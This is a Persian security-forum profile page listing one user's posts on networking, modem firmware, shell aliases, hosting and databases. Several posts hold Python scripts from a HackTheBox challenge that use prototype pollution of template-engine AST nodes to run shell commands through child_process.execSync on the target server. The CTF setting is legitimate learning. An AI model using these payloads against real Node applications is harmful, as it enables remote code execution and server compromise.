رفتن به مطلب
انجمن تیم امنیتی گارد ایران

mmj-sys

کاربر فعال
  • تعداد ارسال ها

    214
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    6

mmj-sys آخرین باز در روز مهر 1 برنده شده

mmj-sys یکی از رکورد داران بیشترین تعداد پسند مطالب است !

7 دنبال کننده

درباره mmj-sys

  • تاریخ تولد ۲۰ بهمن ۱۳۸۵

اطلاعات فردی

  • جنسیت
    آقا

اطلاعات کامپیوتر شخصی

  • سیستم عامل
    Fedora
  • مرورگر
    Firefox
  • آنتی ویروس
    None

آخرین بازدید کنندگان نمایه

1,775 بازدید کننده نمایه
  1. tcp bind نگاه کن توی بایند tcp میای یک پورت به صورت غیر محلی تو نتورک خونگی یا هرچی رو به پورت local نسبت میدی . مثلا اپ سرور من داره رو پورت 8080 کار میکنه ولی مرورگر به 80 و ۴۴۳ ریکو ست میده . حالا تو میای تو کانفیگ سرور میزنی ۸۰ و ۴۴۳ رو بریزه توی ۸۰۸۰ که مثلا اپاچی رانه . خب تو سرور های خیلی خفن از این برای بقیه کارت شبکه ها استفاده میکنن چون هر کارت شبکه قدرت محدوددی داره . حالا tcp reverc یه چیز دیگه ای هست اگه جای اینکه کلاینت به سرور وصل شه سرور به کلاینت وصل شه میشه reverc tcp که تو شل ها معمولا اتفاق میوفته . دیگه هکره نمیره خودشو بکشه فایروال رو بایپس کنه خود کلاینت با برنامه مخرب وصل میشه
  2. نیاز به دستگاه پروگرمر داشته انگار چون دیوایس خاص شرکت خدمت دهندست فکر کنم همچین داستانی داره منم دستگاهشو نداشتم دادم بیرون . تو نت سرچ زدم انگار باید باز بشه تو سوکت خاصی اردینو مانندی رو بزنن و فایل رو به اردینو بدن اون روش رایت کنه .
  3. mmj-sys

    اپدیت مودم ارگ نت argnet

    سلام از دیروز ینی پنجشنبه دارم isp بحث میکنم که چرا نت قطعه با بیست بار بیشتر زنگ زدن فهمیدم باید فریمور رو اپدیت کنم خلاصه انقد گشتم دنبال فریمور مودم argnet w4 خسته شدم وم لاخره خریدمش اپلود میکنم الان ده هزار تومن پول دادم تا فایل رو دانلود کردم وقتی دارم تو پنل ادمین انتخاب میکنم میگه فایل خیلی بزرگه و من هیچ روشی برای کن حجم کردن فایل .bin ندارم الان از شدت بی اعصابی و خستگی دارم مینویسم پس هر کس راهی بلده بگه چون فردا کلاس انلاین دارم و قراره فردا به *** برم Argent-Arg-W4 ashenay aval.BIN
  4. mmj-sys

    اموزش کامند alias

    سلام دوستان کامند alias یه چیزیه که مردم زیاد ازش استفاده نمی کنن یا شایدم میکنن من نمیدونم این کاند میاد و یک کلمه معادل دستورات شما قرار میده که هر وقت اون کلمه رو بزنین بجاش اون وارد بشه به صورت خودکار مثلا خیلی ها عادت دارن بجای ls میان ls -ltrha رو میگیرن و خب کار بدی نیست که همه اطلاعات دایرکتوری رو داشته باشیم alias میاد و یک ورودی رو میگیره و بایستی قالبش این شکلی باشه alias ls="ls -ltrh " الان که دارم مینویسم این کد بالا از راست به چپه نمیدونم چجوری درستش کنم شاید درست نشون داده بشه برا شما اما اگه نشد به بزرگی خودتون ببخشید بریم سر اصل مطلب این کامند میاد مث نام مستعار عمل میکنه اگه کد بالا رو بزنین و بعد ls خالی بگیرین میبینین فرق کرده حالا میتونید برا هر کامندی یا هر کلمه ای که دلتون میخواد alias بزنین و کاند جدید بسازید اگه این کارو انجام بدید متوجه این میشید که ماندگار نیست و با بستن ترمینال میره برای همین باید با توجه به shell تون که پیشفرض bash هست فایل رو ادیت کنید . Bash – ~/.bashrc ZSH – ~/.zshrc Fish – ~/.config/fish/config.fish با دستور nano ./bashrc یادتون باشه به هیچی دست نزنین فقط ته تهش یه خط جدید باز کنید و کامند هایی که میخواید و بزنید اینجوری هر وقت ترمینال باز بشه خودش اجرا میشه
  5. mmj-sys

    نصب کالی

    گراب رو تو کدوم مسیر نصب کردی ؟؟
  6. خب به این کار چه نیازی هست ؟؟ وقتی دامین رو در اختیار داری دیگه زمپ به چه کار میاد ؟؟ روی وی پس اس کافیه cpanel رو نصب کنی
  7. سی پنل هر وبسایت مال سایت ارای دهنده خدمات هاستینگشه رو خود وبسایت نیست
  8. بلاخره با اسکریپت زیر تونستم کارو تموم کنم یه زمانی میگفتن پایتون برای اکسپلویت نویسی عالیه ولی نمیفهمیدم چرا الان به معنای واقعی کلمه درک کردم اسکریپت نهایی import requests TARGET_URL = 'http://host:port' # make pollution r = requests.post(TARGET_URL+'/api/submit', json = {"artist.name":"Westaway", "__proto__.type": "Program", "__proto__.block": { "type": "Text", "line": "process.mainModule.require('child_process').execSync('cat flag2GSEN > static/js/main.js')" } }) print(r.status_code) print(r.text) فقط کافیه با کروم یا یه ریکویست ته اسکریپت رو به مسیر host:port/static/js/main.js بزنید و تهش فلگ خونده میشه و براتون به نمایش در میاد
  9. مشکل در اینجا بود که من وقتی دستور رو میزدم رسپانسش توی هیچی نمیریختم import requests TARGET_URL = 'http://host:port' # make pollution r = requests.post(TARGET_URL+'/api/submit', json = {"artist.name":"Westaway", "__proto__.type": "Program", "__proto__.block": { "type": "Text", "line": "process.mainModule.require('child_process').execSync('ls > static/js/main.js')" } }) print(r.status_code) print(r.text) # اینجا میتونید یه ریکویست به اون صفحه و فایل دلخواه بزنید ولی من با کرون رفتم سریع تر بشه این الان به من فایلا رو نشون داد الان کافیه فایل فلگ رو بخونم
  10. الان متوجه شدم که اسکریپت بالا برای handelbar بوده و سرور از کامپایلر pug استفاده میکنه و الان میتونم به سرور یه چیزی بفرستم ولی پاسخ : 200 {"response":"<span>Hello guestndefine, thank you for letting us know!</span>"} رو داریم اگه اکسپلویت من با اسکریپت زیر : import requests TARGET_URL = 'http://host:port' # make pollution r = requests.post(TARGET_URL+'/api/submit', json = {"artist.name":"Westaway", "__proto__.type": "Program", "__proto__.block": { "type": "Text", "line": "process.mainModule.require('child_process').execSync('ls')" } }) print(r.status_code) print(r.text) کار نمیکرد باید این پاسخ رو میداد 200 {"response":"<span>Hello guest, thank you for letting us know!</span>"} الان نمیدونم چرا کامندم ران نمیشه با اگرهم ران میشه نمیتونم وصل شم
  11. سلام دوستان من امروز توی سایت hackthebox به یک مشکل برخوردم داستان از این قراره که یه سایت هست که فیلد داره و اون فیلد اسم مشخصی رو از ما میگیره یه ورودی رو به ادرس /api/submit پست میکنه که اگه ما یه بخش اضافه با جیسان بفستیم اون کد رو ران میکنه ادرس سایت چلنج رو باید خودتون از hathebox بگیرید چون متفاوته سورس رو هم میتونید دانلود کنید اما من وقتی دنبال این داستان رفتم به هر جایی سر زدم نشد که نشد حتی اسکریپت های خودشون هم که میگن کار کرده کار نمیکنه برا من و 404 میده import requests TARGET_URL = 'http://host:port' r = requests.post(TARGET_URL+'/api/submit', json = { "artist.name":"Gingell", "__proto__.type": "Program", "__proto__.body": [{ "type": "MustacheStatement", "path": 0, "params": [{ "type": "NumberLiteral", "value": "process.mainModule.require('child_process').execSync('cat flag* > static/js/main.js')" }], "loc": { "start": 0, "end": 0 } }] }) print(r.status_code) print(r.text) print(requests.get(TARGET_URL+'/static/main.js').text) لینک چلنج
  12. داداش من خواستم کمکت کنم اما نفهمیدم داری چیکار میکنی چرا کاربر باید توی فیلد عدد رشته bot رو وارد کنه که در اون صورت هم نمیشه چون باید یک تاپل ارد کنه با مقدار که توی تابع اینپوت غیر ممکنه اگه منظورت توی دستور شرط متغیر bot نباید توی پرانتز و کوتیشن بزارید اونجوری میگید bot یک رشته هست در ضمن چرا باز bot ریختید توی جایزه ؟؟؟ کد درهمی بود معلوم نبود چی به چیه
  13. تا جایی که من میدونم یک سرویس ویندوزی هستش
  14. سلام دوستان من یه وب کم creative live motion دارم این رو از عهد بوق خریده بودم ینی زمانی که تازه ویندوز نود هشت درومده بود یه سی دی درایور داره که تست کردم فقط رو ویندوز اکس پی کار کرد الان میخوام رو ویندوز ده امتحانش کنم اما میگه نمی تونید رو این نصبش کنید و بسته میشه درایوراش هم نتونستم پیدا کنم برا ویندوز ده الان هیچ راهی وجود نداره که درایور های اکس پی رو به ویندوز ده منتقل کرد ؟؟؟
  15. اگه تاحالا با اکسل کار کرده باشین میتونین جداول رو مثل یک فایل اکسل در نظر بگیرید من میام و اطلاعات سه نفر رو جمع میکنم و میخوام که فقط نام سن و جنسیت رو ذخیره کنم خب میام و سه سوتون به نام های اسم و سن و جنسیت تشکیل میدم بعد دونه دونه افراد رو توی ردیف ها قرار میدم و اضافه میکنم حالا یه تاپیک رو در نظر بگیر یه اسم داره یه متن داره تگ داره دسته بندی داره تمام این ها در دیتابیس ذخیره می شن دیتابیس های مختلف طرز ذخیره سازی ها مختلف کار میکنن که اکثرن با متن ها کار میکنن اما اگر قرار باشه عکس یا داده های غیر نوشتاری رو ذخیره کنین میتونید به صورت blob ذخیره کنین شون تمام این هایی که گفتم برای sql ها بود nosql ها ساختار این شکلی ندارن

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...